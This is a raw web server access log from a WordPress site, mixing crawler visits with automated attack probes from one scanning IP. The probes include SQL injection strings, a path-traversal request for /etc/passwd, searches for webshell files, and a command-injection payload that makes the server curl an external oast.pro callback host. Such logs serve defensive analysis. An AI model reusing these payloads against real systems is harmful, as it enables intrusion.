120.76.193.63 - - [18/Oct/2025:09:49:44 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (MSIE 8.0; Windows NT 6.0; Trident/7.0; rv:11.0) like Gecko"
157.20.32.210 - - [18/Oct/2025:09:50:37 -0400] "GET /x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:50:42 -0400] "GET /products56817140?kg=0056124331 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:50:45 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:09:50:22 -0400] "GET /wp-comentar.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-comentar.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:50:56 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:51:06 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:09:49:21 -0400] "GET /products60922150?kg=0060179278 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:49:43 -0400] "GET /34EYb4sDI1CMRqEnosucoPr7piC.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute(\"curl+http%3a//d3pm34ikdbcl3g7iqchgmsd5uas5q61f3.oast.pro+-H+'User-Agent%3a+dfRp7d'\")}' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/12.0"
66.249.64.105 - - [18/Oct/2025:09:49:49 -0400] "GET /wp-content/themes/acora/js/fwd/fwdsisc/content/fonts/?SA HTTP/1.1" 200 718 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
157.20.32.210 - - [18/Oct/2025:09:50:05 -0400] "PUT /SDK/webLanguage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
157.20.32.210 - - [18/Oct/2025:09:50:10 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0"
157.20.32.210 - - [18/Oct/2025:09:50:18 -0400] "PUT /SDK/webLanguage HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
157.20.32.210 - - [18/Oct/2025:09:50:21 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0"
66.249.64.105 - - [18/Oct/2025:09:50:28 -0400] "GET /products112774268?kg=0111399055 HTTP/1.1" 200 30323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:50:32 -0400] "OPTIONS /wp-json/omapp/v1/support HTTP/1.1" 200 0 "https://wp.app.optinmonster.test" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:50:34 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0"
157.20.32.210 - - [18/Oct/2025:09:50:44 -0400] "POST / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
157.20.32.210 - - [18/Oct/2025:09:50:42 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
20.171.207.254 - - [18/Oct/2025:09:50:22 -0400] "GET /products60925426?kg=0060182516 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:50:50 -0400] "GET /x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:09:50:48 -0400] "GET /products155043992?kg=0153153293 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:09:50:53 -0400] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1"
216.73.216.159 - - [18/Oct/2025:09:51:00 -0400] "GET /products235644630?kg=0232770998 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:09:51:36 -0400] "GET /products111859512?kg=0110495453 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:09:51:04 -0400] "GET /wp-commentar.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-commentar.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:51:09 -0400] "GET /login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:09:51:12 -0400] "GET /products155037846?kg=0153147222 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:09:51:24 -0400] "GET /products56818948?kg=0056126115 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:09:51:26 -0400] "GET /products60900708?kg=0060158099 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:51:59 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
157.20.32.210 - - [18/Oct/2025:09:52:10 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
157.20.32.210 - - [18/Oct/2025:09:52:23 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
51.79.229.86 - - [18/Oct/2025:09:51:54 -0400] "GET /wp-komentar.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-komentar.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:52:28 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:52:31 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:52:52 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:52:55 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:53:03 -0400] "GET /wp-admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12"
157.20.32.210 - - [18/Oct/2025:09:53:14 -0400] "GET /wp-admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12"
51.79.229.86 - - [18/Oct/2025:09:52:35 -0400] "GET /wp-Komentar.php HTTP/1.1" 503 854 "http://salhab360photos.com/wp-Komentar.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:09:53:26 -0400] "GET /products112534918?kg=0111162622 HTTP/1.1" 200 30276 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:53:29 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0"
157.20.32.210 - - [18/Oct/2025:09:53:32 -0400] "GET /geoserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10"
157.20.32.210 - - [18/Oct/2025:09:53:34 -0400] "GET /about/../tree?action=get HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
157.20.32.210 - - [18/Oct/2025:09:52:39 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:52:42 -0400] "POST /wp-login.php HTTP/1.1" 200 0 "https://salhab360photos.com" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:52:28 -0400] "GET /products60881806?kg=0060139426 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
89.21.85.28 - - [18/Oct/2025:09:52:49 -0400] "GET /file-manager/ckeditor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:53:27 -0400] "GET /wp-admin/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.12) Gecko/20100101 Firefox/128.12"
157.20.32.210 - - [18/Oct/2025:09:53:23 -0400] "GET /about/../tree?action=get HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
157.20.32.210 - - [18/Oct/2025:09:53:40 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0"
157.20.32.210 - - [18/Oct/2025:09:53:47 -0400] "GET /about/../tree?action=get HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
157.20.32.210 - - [18/Oct/2025:09:53:53 -0400] "POST /cobbler_api HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0"
157.20.32.210 - - [18/Oct/2025:09:53:56 -0400] "GET /geoserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10"
157.20.32.210 - - [18/Oct/2025:09:54:23 -0400] "POST /api/v1/login/oauth2/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
157.20.32.210 - - [18/Oct/2025:09:54:36 -0400] "POST /api/v1/login/oauth2/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
51.79.229.86 - - [18/Oct/2025:09:54:20 -0400] "GET /rajatogel.php HTTP/1.1" 503 854 "http://salhab360photos.com/rajatogel.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:09:54:35 -0400] "GET /products60941580?kg=0060198471 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:09:55:32 -0400] "GET /?products1295564?kg=0001279847 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:55:23 -0400] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:55:36 -0400] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:55:44 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:55:49 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:55:55 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:54:56 -0400] "GET /sitfile.php HTTP/1.1" 503 854 "http://salhab360photos.com/sitfile.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:09:55:37 -0400] "GET /products60906930?kg=0060164244 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:56:13 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:21 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:32 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:44 -0400] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
157.20.32.210 - - [18/Oct/2025:09:56:40 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
157.20.32.210 - - [18/Oct/2025:09:53:43 -0400] "GET /geoserver/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10"
20.171.207.254 - - [18/Oct/2025:09:53:30 -0400] "GET /products60930710?kg=0060187734 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:09:53:26 -0400] "GET /wp-about.phtml HTTP/1.1" 503 854 "http://salhab360photos.com/wp-about.phtml" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:54:12 -0400] "POST /api/v1/login/oauth2/auth HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
66.249.64.106 - - [18/Oct/2025:09:54:20 -0400] "GET /products4714016?kg=0004656609 HTTP/1.1" 200 29163 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.107 - - [18/Oct/2025:09:55:18 -0400] "GET /?products579608?kg=0000572621 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:09:55:12 -0400] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:00 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:08 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:16 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
157.20.32.210 - - [18/Oct/2025:09:56:27 -0400] "POST /controller/login.php?acao=autenticar HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
157.20.32.210 - - [18/Oct/2025:09:56:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:09:56:57 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
35.179.127.116 - - [18/Oct/2025:09:56:57 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
152.42.157.60 - - [18/Oct/2025:09:56:58 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
206.189.247.132 - - [18/Oct/2025:09:57:19 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
35.179.127.116 - - [18/Oct/2025:09:57:19 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
51.79.229.86 - - [18/Oct/2025:09:56:07 -0400] "GET /rajaslot.php HTTP/1.1" 503 854 "http://salhab360photos.com/rajaslot.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:57:25 -0400] "POST /viewlog.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
196.240.60.216 - - [18/Oct/2025:09:56:58 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:09:56:54 -0400] "GET /account/edit-profile/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
20.171.207.254 - - [18/Oct/2025:09:56:42 -0400] "GET /products60881880?kg=0060139501 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:57:05 -0400] "GET /account/edit-profile/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
146.190.11.185 - - [18/Oct/2025:09:57:21 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0"
157.20.32.210 - - [18/Oct/2025:09:57:18 -0400] "GET /account/edit-profile/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
157.20.32.210 - - [18/Oct/2025:09:57:14 -0400] "POST /viewlog.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
157.20.32.210 - - [18/Oct/2025:09:58:05 -0400] "POST /delete_cart_goods.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
108.167.132.73 - - [18/Oct/2025:09:57:17 -0400] "GET /wp-login.php HTTP/1.1" 503 854 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
157.20.32.210 - - [18/Oct/2025:09:58:18 -0400] "POST /delete_cart_goods.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:09:58:59 -0400] "POST /v1/backend1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:09:58:46 -0400] "GET /products60901724?kg=0060159103 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:09:59:10 -0400] "POST /v1/backend1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:09:58:15 -0400] "GET /admintogel.php HTTP/1.1" 503 854 "http://salhab360photos.com/admintogel.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:09:59:22 -0400] "POST /action.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
108.167.132.73 - - [18/Oct/2025:09:58:19 -0400] "POST /wp-login.php HTTP/1.1" 503 854 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6"
157.20.32.210 - - [18/Oct/2025:09:59:29 -0400] "POST /homeaction.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
157.20.32.210 - - [18/Oct/2025:09:59:33 -0400] "POST /action.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:09:59:36 -0400] "GET /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
157.20.32.210 - - [18/Oct/2025:09:59:46 -0400] "POST /action.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:09:57:38 -0400] "POST /viewlog.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
157.20.32.210 - - [18/Oct/2025:09:57:54 -0400] "POST /delete_cart_goods.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15"
98.70.29.56 - - [18/Oct/2025:09:57:28 -0400] "POST /wp-login.php HTTP/1.1" 503 1866 "-" "Mozilla/5.0"
